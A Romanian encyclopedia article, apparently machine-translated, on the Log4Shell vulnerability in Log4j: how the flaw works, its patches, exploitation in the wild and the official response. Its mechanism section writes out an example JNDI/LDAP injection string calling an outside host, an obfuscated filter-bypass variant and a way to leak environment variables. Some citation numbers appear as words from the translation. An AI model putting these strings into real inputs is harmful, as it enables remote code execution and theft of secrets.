Log4Shell

Versiunea actuală a paginii nu a fost încă examinată de colaboratori experimentați și poate diferi semnificativ de versiunea revizuită pe 12 mai 2022; verificările necesită 3 modificări .

Log4Shell ( CVE-2021-44228 ) este o vulnerabilitate zero-day în Log4j , un cadru popular de înregistrare Java, care implică execuția de cod arbitrar. [1] [2] Vulnerabilitatea - existența sa nu a mai fost văzută din 2013 - a fost dezvăluită în mod privat de Apache Software Foundation , din care Log4j este un proiect, de Chen Zhaojun de la echipa de securitate Alibaba Cloud pe 24 noiembrie 2021 și public divulgat pe 9 decembrie 2021. [3] [4] [5] [6] Apache i-a acordat Log4Shell un scor de severitate CVSS de 10, cel mai mare rating disponibil. [7]Exploatarea se estimează că afectează sute de milioane de dispozitive și este foarte ușor de utilizat. [8] [9]

Vulnerabilitatea exploatează faptul că Log4j permite solicitări către servere LDAP și JNDI arbitrare, mai degrabă decât să valideze răspunsuri, [1] [10] [11] permițând atacatorilor să execute cod Java arbitrar pe un server sau pe altă mașină sau să transmită informații sensibile. [5] Apache Security Group a publicat o listă a proiectelor software afectate. [12] Serviciile comerciale afectate includ Amazon Web Services , [13] Cloudflare , iCloud , [14] Minecraft: Java Edition , [15] Steam , Tencent QQ și multe altele. [10] [16] [17] Potrivit Wiz și EY , vulnerabilitatea a afectat 93% din mediile cloud pentru întreprinderi. [optsprezece]

Experții au descris Log4Shell drept cea mai mare vulnerabilitate de până acum; [19] LunaSec a descris-o drept „un eșec de proiectare de proporții catastrofale”, [5] Tenable a spus că exploitul a fost „cea mai mare și cea mai critică vulnerabilitate din istorie”, [20] Ars Technica a numit-o „probabil cea mai gravă vulnerabilitate de până acum”. . [21] și The Washington Post au spus că descrierile experților în securitate „se limitează la apocalipsă”. [19]

Fundal

Log4j este o bibliotecă de înregistrare open source care permite dezvoltatorilor de software înregistreze date în aplicațiile lor. Aceste date pot include introducerea utilizatorului. [22] Este omniprezent în aplicațiile Java, în special în software-ul pentru întreprinderi. [5] Scrisă inițial în 2001 de Cheki Gulcu, acum face parte din Apache Logging Services, un proiect al Apache Software Foundation . [23] Fostul membru al Comisiei de securitate cibernetică a președintelui Barack Obama , Tom Kellermann, a descris Apache drept „unul dintre stâlpii giganți ai podului care facilitează țesutul conjunctiv dintre lumile aplicațiilor și mediul de calcul”. [24]

Comportament

Java Naming and Directory Interface (JNDI) vă permite să căutați obiecte Java în timpul execuției, având în vedere calea către datele lor. JNDI poate folosi mai multe interfețe de directoare, fiecare oferind o schemă diferită de căutare a fișierelor. Printre aceste interfețe se numără Lightweight Directory Access Protocol (LDAP), un protocol non-Java [25] care preia datele obiectului sub forma unui URL de pe un server adecvat, local sau orice altul de pe Internet. [26]

În configurația implicită, când un șir este înregistrat, Log4j 2 efectuează înlocuirea șirului în expresii de forma ${prefix:name}. [26] De exemplu, Text: ${java:version}puteți converti în Text: Java version 1.7.0_67. [27] Printre expresiile recunoscute se numără ${jndi:<lookup>} ; prin specificarea unei căutări prin LDAP, un URL arbitrar poate fi interogat și încărcat ca date de obiect Java. ${jndi:ldap://example.com/file}va descărca date de la această adresă URL atunci când este conectat la internet. Prin introducerea unui șir care este înregistrat, un atacator poate descărca și executa cod rău intenționat găzduit pe o adresă URL publică. [26] Chiar dacă execuția datelor este dezactivată, un atacator poate obține date, cum ar fi variabile secrete de mediu, plasându-le într-un URL unde vor fi înlocuite și trimise la serverul atacatorului. [28] [29] În plus față de LDAP, alte protocoale de căutare JNDI potențial utile includ varianta sa sigură LDAPS, Java Remote Method Invocation (RMI), Domain Name System (DNS) și Internet Inter-ORB Protocol (IIOP). [30] [31]

Deoarece solicitările HTTP sunt adesea înregistrate, un vector de atac comun este plasarea unui șir rău intenționat în adresa URL a solicitării HTTP sau într-un antet HTTP înregistrat frecvent , cum ar fi User-Agent. Protecția timpurie includea blocarea oricăror solicitări care conțineau conținut potențial rău intenționat, cum ar fi ${jndi. [32] O căutare naivă poate fi ocolită prin obscurcarea interogării: de exemplu, ${${lower:j}ndiva fi convertită într-o căutare JNDI după efectuarea unei operații cu șir pe litera j. [33] Chiar dacă o intrare, cum ar fi un nume, nu este înregistrată imediat, aceasta poate fi înregistrată ulterior în timpul procesării interne și conținutul său poate fi executat. [26]

Corecții

Remedieri pentru această vulnerabilitate au fost lansate pe 6 decembrie 2021, cu trei zile înainte ca vulnerabilitatea să fie publicată, în versiunea Log4j 2.15.0-rc1. [34] [35] [36] Remedierea a inclus limitarea serverelor și protocoalelor care pot fi utilizate pentru căutări. Cercetătorii au descoperit o eroare asociată CVE-2021-45046 care permite executarea codului local sau de la distanță în anumite configurații non-implicite și a fost remediată în versiunea 2.16.0, care a dezactivat toate caracteristicile folosind JNDI și suport pentru căutarea mesajelor. [37] [38] Pentru versiunile anterioare, clasa org.apache.logging.log4j.core.lookup. JndiLookuptrebuie eliminată din classpath pentru a atenua ambele vulnerabilități. [7] [37] Remedierea recomandată anterior pentru versiunile mai vechi a fost să setați proprietatea sistemului log4j2.formatMsgNoLookups truela , dar această modificare nu împiedică utilizarea CVE-2021-45046. [37]

Versiunile mai noi ale Java Runtime Environment (JRE) atenuează, de asemenea, această vulnerabilitate prin blocarea în mod implicit a încărcării codului de la distanță, deși alți vectori de atac încă există în unele aplicații. [1] [28] [39] [40] Au fost publicate mai multe metode și instrumente pentru a ajuta la detectarea utilizării versiunilor vulnerabile ale log4j în pachetele Java încorporate. [41]

Utilizare

Exploatarea permite hackerilor să preia controlul asupra dispozitivelor vulnerabile folosind Java . [8] Unii hackeri folosesc vulnerabilitatea pentru a profita de dispozitivele victimelor; inclusiv extragerea de criptomonede , crearea de rețele botnet , trimiterea de spam, crearea de uși din spate și alte activități ilegale, cum ar fi atacurile ransomware. [8] [19] [42] În zilele de după lansarea vulnerabilității , Check Point a urmărit milioane de atacuri inițiate de hackeri, unii cercetători observând peste o sută de atacuri pe minut, ducând în cele din urmă la peste 40% dintre atacuri. rețelele de afaceri supuse atacurilor internaționale. [8] [24]

Potrivit CEO-ului Cloudflare, Matthew Prince, dovezile utilizării sau testării exploatării au apărut încă de la 1 decembrie, cu nouă zile înainte ca acestea să fie dezvăluite public. [43] Potrivit firmei de securitate cibernetică GreyNoise, mai multe adrese IP  au fost răzuite de site-uri web pentru a verifica dacă există servere care au vulnerabilitatea. [44] Mai multe rețele botnet au început să scaneze pentru vulnerabilitate, inclusiv botnet-ul Muhstik până pe 10 decembrie, precum și Mirai , Tsunami și XMRig. [8] [43] [45] Conti a fost văzut exploatând vulnerabilitatea pe 17 decembrie. [19]

Unele grupuri sponsorizate de stat din China și Iran au folosit și exploit-ul, potrivit Check Point, deși nu se știe dacă exploatarea a fost folosită de Israel, Rusia sau SUA înainte ca vulnerabilitatea să fie dezvăluită. [19] [46] Check Point a declarat că pe 15 decembrie 2021, hackerii susținuți de Iran au încercat să se infiltreze în afacerile israeliene și în rețelele guvernamentale. [19]

Răspuns și influență

Guvernul

În Statele Unite , directorul Agenției de Securitate Cibernetică și Infrastructură (CISA), Jen Easterly, a descris exploit-ul drept „una dintre cele mai grave, dacă nu chiar cea mai serioasă pe care le-am văzut în întreaga mea carieră”, explicând că sute de milioane de dispozitive au fost afectate. și a recomandat ca vânzătorii să plătească prioritizarea actualizărilor de software. [8] [47] [48] Agențiile civile angajate de guvernul SUA au avut până la 24 decembrie 2021 pentru a remedia vulnerabilitățile, deși până atunci asta ar fi permis accesul la sute de mii de ținte. [19]

Centrul canadian pentru securitate cibernetică (CCCS) a cerut organizațiilor să ia măsuri imediate. [49] Agenția Canadiană de Venituri și-a dezactivat temporar serviciile online după ce a aflat despre exploit, în timp ce guvernul Quebec a închis aproape 4.000 de site-uri web ca o „măsură preventivă”. [cincizeci]

Oficiul Federal de Securitate German ( Bundesamt für Sicherheit in der Informationstechnik) (BSI) a identificat exploatarea ca fiind la cel mai înalt nivel de amenințare, numind-o „situație periculoasă extrem de critică” (tradus). El a mai spus că mai multe atacuri au avut deja succes și că amploarea vulnerabilității este încă dificil de evaluat. [51] [52] Centrul Național Olandez de Securitate Cibernetică (NCSC) a început o listă permanentă de aplicații vulnerabile. [53] [54]

Ministerul Industriei și Tehnologiei Informației din China a suspendat Alibaba Cloud ca partener de analiză a amenințărilor de securitate cibernetică timp de șase luni, după ce nu a raportat mai întâi vulnerabilitatea guvernului. [55]

Afaceri

Un studiu realizat de Wiz și EY [18] a constatat că 93% din mediul de întreprindere cloud era vulnerabil la Log4Shell. 7% dintre sarcinile vulnerabile sunt disponibile online și fac obiectul unor încercări extinse de exploatare. Potrivit studiului, la zece zile după publicarea vulnerabilității (20 decembrie 2021), doar 45% din sarcinile de lucru afectate au fost corectate în medie în mediile cloud. Datele din cloud de la Amazon, Google și Microsoft au fost afectate de Log4Shell. [19]

Compania de HR și HR UKG, una dintre cele mai mari companii din industrie, a fost lovită de un atac ransomware care afectează marile companii. [21] [56] UKG a declarat că nu are nicio dovadă că Log4Shell a fost folosit în incident, deși analistul Allan Liska de la compania de securitate cibernetică Recorded Future a spus că ar putea exista o conexiune. [57]

Pe măsură ce companiile mai mari au început să lanseze patch-uri pentru exploatare, riscul pentru întreprinderile mici a crescut, deoarece hackerii s-au concentrat pe ținte mai vulnerabile. [42]

Confidențialitate

Dispozitivele personale, cum ar fi televizoarele inteligente și camerele de securitate conectate la internet, au fost vulnerabile la exploatare. [19]

Analiză

Începând cu 14 decembrie 2021, aproape jumătate din toate rețelele corporative din lume au fost investigate activ și peste 60 de variante de exploatare au fost create într-o zi. [58] Check Point Software Technologies, într-o analiză detaliată, a descris situația ca „o adevărată pandemie cibernetică” și a descris potențialul de daune ca fiind „incalculabil”. [59] Câteva dintre recomandările inițiale au supraestimat numărul de pachete vulnerabile, ducând la rezultate false pozitive. În special, pachetul „log4j api” a fost marcat ca vulnerabil, în timp ce, de fapt, investigațiile ulterioare au arătat că doar pachetul principal „log4j-core” era vulnerabil.

Acest lucru a fost confirmat atât în ​​ramura de lansare inițială [60] , cât și de către cercetătorii externi de securitate.

Revista de tehnologie Wired a scris că, în ciuda „hype-ului” anterioară din jurul numeroaselor vulnerabilități, „hype-ul din jurul vulnerabilității Log4j... este justificat din mai multe motive”. [46] Revista explică că omniprezența log4j, a cărui vulnerabilitate este greu de detectat de către potențialele ținte, și ușurința cu care codul poate fi transferat pe mașina unei victime au creat „o combinație de seriozitate, accesibilitate și prevalență care i-a șocat pe profesioniștii din securitate. ." [46] Wired a prezentat schematic și secvența utilizării Log4Shell de către hackeri: grupurile miniere de criptomonede vor fi primele care exploatează vulnerabilitatea, apoi comercianții de date vor vinde „capul de pod” infractorilor cibernetici, care în cele din urmă se vor angaja în extorcare, spionaj și distrugere de date. . [46]

Amit Göran, CEO al Tenable și director fondator al Grupului de pregătire pentru urgențe în computere din SUA , a declarat „[Log4Shell] este de departe cea mai mare și cea mai critică vulnerabilitate din istorie”, menționând că atacurile sofisticate au început la scurt timp după eroare, afirmând: „De asemenea, noi Am văzut deja că este folosit pentru atacuri ransomware, care, din nou, ar trebui să fie un semnal de alarmă major... Am văzut, de asemenea, rapoarte despre atacatori care folosesc Log4Shell pentru a distruge sisteme fără a încerca măcar să obțină o răscumpărare - un comportament destul de neobișnuit." . [46] Sean Gallagher, cercetător senior în domeniul amenințărilor Sophos , a spus: „Ca să fiu sincer, cea mai mare amenințare aici este că oamenii au obținut deja acces și doar îl folosesc și, chiar dacă remediați problema, cineva este deja online... există atâta timp cât Internetul”. [douăzeci]

Note

  1. 123 Wortley . _ Log4Shell: Exploit RCE de 0 zile găsit în log4j 2, un pachet popular de jurnalizare Java . LunaSec (9 decembrie 2021). Preluat la 12 decembrie 2021. Arhivat din original la 25 decembrie 2021.  
  2. CVE-2021-44228 . Vulnerabilități și expuneri comune . Preluat la 12 decembrie 2021. Arhivat din original la 25 decembrie 2021.
  3. Povolny. Vulnerabilitatea Log4Shell este cărbunele din stocul nostru pentru  2021 . McAfee (10 decembrie 2021). Preluat la 12 decembrie 2021. Arhivat din original la 24 decembrie 2021.
  4. Cea mai proastă zi Apache Log4j RCE Zero Day aruncată pe Internet . Cyber ​​​​Kendra (9 decembrie 2021). Preluat la 12 decembrie 2021. Arhivat din original la 24 decembrie 2021.
  5. 1 2 3 4 Newman . „Internetul este în flăcări”  (Eng.) , prin cablu  (10 decembrie 2021). Arhivat din original pe 24 decembrie 2021. Preluat la 12 decembrie 2021.
  6. Murphy . Hackerii lansează peste 1,2 milioane de atacuri prin defectul Log4J , Financial Times  (14 decembrie 2021). Arhivat din original pe 17 decembrie 2021. Preluat la 17 decembrie 2021.
  7. 1 2 Vulnerabilități de securitate Apache Log4j . Log4j . Apache Software Foundation. Preluat la 12 decembrie 2021. Arhivat din original la 26 decembrie 2021.
  8. 1 2 3 4 5 6 Murphy, Hannah . Hackerii lansează peste 1,2 milioane de atacuri prin defectul Log4J , Financial Times  (14 decembrie 2021). Arhivat din original pe 21 decembrie 2021. Preluat la 25 decembrie 2021.
  9. Hunter. Cea mai „gravă” încălcare a securității vreodată se desfășoară chiar acum. Iată ce trebuie să știți. . The Washington Post (20 decembrie 2021). Preluat la 25 decembrie 2021. Arhivat din original la 27 decembrie 2021.
  10. 12 Mott . Nenumărate servere sunt vulnerabile la Apache Log4j Zero-Day Exploit . Revista PC (10 decembrie 2021). Preluat la 12 decembrie 2021. Arhivat din original la 24 decembrie 2021.  
  11. Goodin. Zero-day în instrumentul omniprezent Log4j reprezintă o amenințare gravă pentru   Internet ? . Ars Technica (10 decembrie 2021). Preluat la 12 decembrie 2021. Arhivat din original la 23 decembrie 2021.
  12. Proiecte Apache afectate de log4j CVE-2021-44228 (14 decembrie 2021). Preluat la 25 decembrie 2021. Arhivat din original la 17 decembrie 2021.
  13. Actualizare pentru problema Apache Log4j2 (CVE-2021-44228) . Amazon Web Services (12 decembrie 2021). Preluat la 13 decembrie 2021. Arhivat din original la 28 decembrie 2021.
  14. Lovejoy. Apple corectează vulnerabilitatea Log4Shell iCloud, descrisă ca fiind cea mai critică dintr-un deceniu . 9to5mac (14 decembrie 2021). Preluat la 25 decembrie 2021. Arhivat din original la 23 decembrie 2021.
  15. Vulnerabilitatea de securitate în Minecraft: Java Edition . Minecraft . Studiourile Mojang . Preluat la 13 decembrie 2021. Arhivat din original la 24 decembrie 2021.
  16. Goodin. Cei mai mari jucători de pe Internet sunt toți afectați de Log4Shell 0-day critic . ArsTechnica (10 decembrie 2021). Preluat la 13 decembrie 2021. Arhivat din original la 25 decembrie 2021.
  17. Rundle. Ce este vulnerabilitatea Log4j? (15 decembrie 2021). Preluat la 25 decembrie 2021. Arhivat din original la 25 decembrie 2021.
  18. ↑ 1 2 Întreprinderi la jumătatea procesului de corecție a Log4Shell | blogul wiz . www.wiz.io. _ Preluat la 20 decembrie 2021. Arhivat din original la 20 decembrie 2021.
  19. 1 2 3 4 5 6 7 8 9 Hunter, Tatum; de Vynck, Gerrit Cea mai „gravă” breșă de securitate se desfășoară vreodată chiar acum. Iată ce trebuie să știți. . The Washington Post (20 decembrie 2021). Preluat la 25 decembrie 2021. Arhivat din original la 27 decembrie 2021.
  20. ↑ 12 Barrett . _ Următorul val de atacuri Log4J va fi brutal (engleză) , prin cablu . Arhivat din original pe 17 decembrie 2021. Preluat la 17 decembrie 2021. 
  21. ↑ 12 Goodin . În timp ce Log4Shell face ravagii, serviciul de salarizare raportează   un atac ransomware ? . Ars Technica (13 decembrie 2021). Preluat la 17 decembrie 2021. Arhivat din original la 17 decembrie 2021.
  22. Yan. O altă vulnerabilitate Apache Log4j este exploatată activ în sălbăticie (CVE-2021-44228) . Unitatea 42 . Palo Alto Networks (10 decembrie 2021). Preluat la 25 decembrie 2021. Arhivat din original la 24 decembrie 2021.
  23. Apache Log4j 2 . Apache Software Foundation. Preluat la 12 decembrie 2021. Arhivat din original la 14 decembrie 2021.
  24. ↑ 1 2 Byrnes. Vulnerabilitatea Hillicon Valley - Apache declanșează  alarma . Dealul (14 decembrie 2021). Preluat la 17 decembrie 2021. Arhivat din original la 17 decembrie 2021.
  25. "" . RFC rfc4511.
  26. 1 2 3 4 Graham-Cumming. În interiorul vulnerabilității Log4j2 (CVE-2021-44228  ) . Blogul Cloudflare (10 decembrie 2021). Preluat la 13 decembrie 2021. Arhivat din original la 22 decembrie 2021.
  27. Căutări . Log4j . Apache Software Foundation. Preluat la 13 decembrie 2021. Arhivat din original la 25 decembrie 2021.
  28. 12 Ducklin . Log4Shell a explicat – cum funcționează, de ce trebuie să știți și cum să o remediați . Naked Security . Sophos (12 decembrie 2021). Preluat la 12 decembrie 2021. Arhivat din original la 26 decembrie 2021.
  29. Miessler. Situația log4j (Log4Shell) . Învățare nesupravegheată (13 decembrie 2021). Preluat la 25 decembrie 2021. Arhivat din original la 13 decembrie 2021.
  30. Duraishamy. Corectează acum Vulnerabilitatea Apache Log4j numită Log4Shell Exploatată activ . Trend Micro (13 decembrie 2021). Preluat la 14 decembrie 2021. Arhivat din original la 20 decembrie 2021.
  31. Narang. CVE-2021-44228: Dovada de concept pentru vulnerabilitatea critică de execuție a codului la distanță Apache Log4j disponibilă (Log4Shell) . Blog Tenable (10 decembrie 2021). Preluat la 14 decembrie 2021. Arhivat din original la 20 decembrie 2021.
  32. Gabor. CVE-2021-44228 - Log4j RCE atenuare 0 zile . Blogul Cloudflare (10 decembrie 2021). Preluat la 13 decembrie 2021. Arhivat din original la 23 decembrie 2021.
  33. Hahad. Vulnerabilitatea Apache Log4j CVE-2021-44228 ridică îngrijorări larg răspândite (12 decembrie 2021). Preluat la 12 decembrie 2021. Arhivat din original la 13 decembrie 2021.
  34. ↑ Restricționați accesul LDAP prin JNDI de către utilizatorii #608  . Log4j (5 decembrie 2021). Preluat la 12 decembrie 2021. Arhivat din original la 30 decembrie 2021.
  35. Berger. Ce este Log4Shell? Vulnerabilitatea Log4j a fost explicată (și ce trebuie făcut în privința ei) . Știri Dynatrace (17 decembrie 2021). Apache a emis un patch pentru CVE-2021-44228, versiunea 2.15, pe 6 decembrie. Cu toate acestea, acest patch a lăsat o parte din vulnerabilitate neremediată, rezultând în CVE-2021-45046 și un al doilea patch, versiunea 2.16, lansat pe 13 decembrie Apache a lansat. un al treilea patch, versiunea 2.17, pe 17 decembrie pentru a remedia o altă vulnerabilitate asociată, CVE-2021-45105.” Preluat la 25 decembrie 2021. Arhivat din original la 21 decembrie 2021.
  36. Rudis. Exploatarea pe scară largă a execuției codului critic de la distanță în Apache Log4j |  Rapid7 Blog . Rapid7 (10 decembrie 2021). Preluat la 25 decembrie 2021. Arhivat din original la 21 decembrie 2021.
  37. 123 CVE - 2021-45046 . Vulnerabilități și expuneri comune (15 decembrie 2021). Preluat la 15 decembrie 2021. Arhivat din original la 25 decembrie 2021.
  38. Greig. A doua vulnerabilitate Log4j descoperită, patch-ul deja  lansat . ZDNet (14 decembrie 2021). Preluat la 17 decembrie 2021. Arhivat din original la 27 decembrie 2021.
  39. Java(TM) SE Development Kit 8, Update 121 (JDK 8u121) Release  Notes . Oracle (17 ianuarie 2017). Preluat la 13 decembrie 2021. Arhivat din original la 19 decembrie 2021.
  40. Exploatarea injecțiilor JNDI în Java . Veracode (3 ianuarie 2019). Preluat la 15 decembrie 2021. Arhivat din original la 15 decembrie 2021.
  41. Ghid: Cum să detectați și să atenuați vulnerabilitatea Log4Shell (CVE-2021-44228  ) . www.lunasec.io (13 decembrie 2021). Preluat la 13 decembrie 2021. Arhivat din original la 24 decembrie 2021.
  42. ↑ 12 Woodyard .  „Vulnerabilitate critică ” : firmelor mai mici le poate fi mai greu să împiedice hackerii să exploateze defectul Log4j  ? . USA Today . Data accesului: 17 decembrie 2021.
  43. 12 Duckett . Activitatea Log4j RCE a început pe 1 decembrie, deoarece botnet-urile încep să folosească  vulnerabilitatea . ZDNet . Preluat la 13 decembrie 2021. Arhivat din original la 22 decembrie 2021.
  44. Activitatea de exploatare pentru vulnerabilitatea Apache Log4j - CVE-2021-44228 . Greynoise Research (10 decembrie 2021). Preluat la 14 decembrie 2021. Arhivat din original la 20 decembrie 2021.
  45. Zugec. Consultanță tehnică: vulnerabilitate critică zero-day în Log4j2 exploatată în sălbăticie . perspective de afaceri . Bitdefender (13 decembrie 2021). Preluat la 25 decembrie 2021. Arhivat din original la 15 decembrie 2021.
  46. 1 2 3 4 5 Barrett, Brian . Următorul val de atacuri Log4J va fi brutal  (engleză) , prin cablu . Arhivat din original pe 27 decembrie 2021. Preluat la 25 decembrie 2021.
  47. Declarația directorului CISA Easterly privind vulnerabilitatea „Log4j” . CISA (11 decembrie 2021). Preluat la 25 decembrie 2021. Arhivat din original la 27 decembrie 2021.
  48. Woodyard, Chris „Vulnerabilitate critică  ” : Firmele mai mici ar putea fi mai greu să împiedice hackerii să exploateze defectul Log4j  ? . USA Today . Data accesului: 17 decembrie 2021.
  49. Declarație a ministrului apărării naționale cu privire la vulnerabilitatea Apache și apel către organizațiile canadiene să ia  măsuri urgente . Guvernul Canadei (12 decembrie 2021). Preluat la 25 decembrie 2021. Arhivat din original la 20 decembrie 2021.
  50. Cabrera . Confruntându-se cu amenințările la adresa securității cibernetice, Quebec închide site-urile web guvernamentale pentru evaluare , CBC News  (12 decembrie 2021). Arhivat din original pe 20 decembrie 2021. Preluat la 12 decembrie 2021.
  51. Sauerwein. BSI warnt vor Sicherheitslücke  (germană) . Tagesschau (12 decembrie 2021). Preluat la 25 decembrie 2021. Arhivat din original la 5 ianuarie 2022.
  52. (11 decembrie 2021). Warnstufe Rot: Schwachstelle Log4Shell führt zu extrem kritischer Bedrohungslage (in de). Comunicat de presă . Arhivat din original la 13 decembrie 2021. Preluat 2021-12-25 .
  53. J. Vaughan-Nichols. Log4Shell: Avem atât de multe probleme . The New Stack (14 decembrie 2021). Preluat la 25 decembrie 2021. Arhivat din original la 23 decembrie 2021.
  54. NCSC-NL/log4shell . Centrul Național de Securitate Cibernetică (Olanda). Preluat la 14 decembrie 2021. Arhivat din original la 29 decembrie 2021.
  55. Bug Apache Log4j: Ministerul industriei din China atrage sprijin de la Alibaba Cloud pentru că nu a raportat mai întâi defectul guvernului . Preluat la 25 decembrie 2021. Arhivat din original la 25 decembrie 2021.
  56. Bray. Eroarea emergentă a software-ului „Log4j” generează îngrijorare la nivel mondial cu privire la atacurile cibernetice - The Boston   Globe ? . The Boston Globe (15 decembrie 2021). Preluat la 17 decembrie 2021. Arhivat din original la 17 decembrie 2021.
  57. Bray, Hiawatha Eroarea software-ului „Log4j” emergentă generează îngrijorare la nivel mondial cu privire la atacurile cibernetice - The Boston   Globe ? . The Boston Globe (15 decembrie 2021). Preluat la 17 decembrie 2021. Arhivat din original la 17 decembrie 2021.
  58. Aproape jumătate dintre rețele au testat punctele slabe ale Log4Shell . ComputerWeekly (14 decembrie 2021). Preluat la 25 decembrie 2021. Arhivat din original la 20 decembrie 2021.
  59. Cifrele din spatele unei pandemii cibernetice – scufundare detaliată . Software Check Point (13 decembrie 2021). Preluat la 25 decembrie 2021. Arhivat din original la 24 decembrie 2021.
  60. LOG4J2-3201: Limitați protocoalele pe care JNDI le poate folosi și restricționa LDAP. . Instrumentul de urmărire a problemelor Apache JIRA . Preluat la 14 decembrie 2021. Arhivat din original la 25 decembrie 2021.